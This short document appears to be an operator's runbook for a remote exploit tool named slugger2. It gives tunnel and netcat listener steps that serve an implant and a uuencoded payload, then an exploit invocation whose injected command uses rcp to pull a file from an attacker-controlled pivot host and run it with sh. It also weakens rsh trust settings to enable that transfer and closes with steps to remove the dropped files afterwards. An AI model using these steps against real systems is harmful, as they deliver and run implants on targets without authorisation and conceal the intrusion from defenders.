window 1) -tunnel r 443 u ###PCNFSDPORT### ###TARGETIP### window 2) nc -vv -l -p 514 < nopen.t # edit nopen.t, note the size, subtract 14 from the actual size and replace 366 with the new size window 3) -rtun 514 127.0.0.1 window 4) nc -vv -l -p 443 < sendmail.uu window 5) ./slugger2 ###TARGETIP### ###TARGETPORT### "cd .. cd .. cd .. cd .. cd tmp rcp -p ###PI###:t .t sh .t " An alternative to the above is to use rcp. Get rid of the nulls and header info from nopen.t first. For direct connects, no problem. Through a PI, seems to be a problem. 1) vi ~/.rhosts enter FQDN of jumpoff/pi 2) echo rsh >> /etc/securetty 3) cat /etc/xinetd.d/rsh # default: on # description: The rshd server is the server for the rcmd(3) routine and, \ # consequently, for the rsh(1) program. The server provides \ # remote execution facilities with authentication based on \ # privileged port numbers from trusted hosts. service shell { disable = no socket_type = stream wait = no user = root log_on_success += USERID log_on_failure += USERID server = /usr/sbin/in.rshd } 4) /etc/init.d/xinetd start TARGETPORT=###TARGETPORT### cp ../up/noserver /root/sendmail file /root/sendmail cp ../bin/pcnfsd.t /root/t vi /root/t ./slugger2 ###TARGETIP### "rcp -p ###LOCALIP###:t .t sh .t" afterwards, check and clean: ls -lart /var/spool/pcnfs ls -al / ls -al /etc/rc3.d rm -- -p rm .t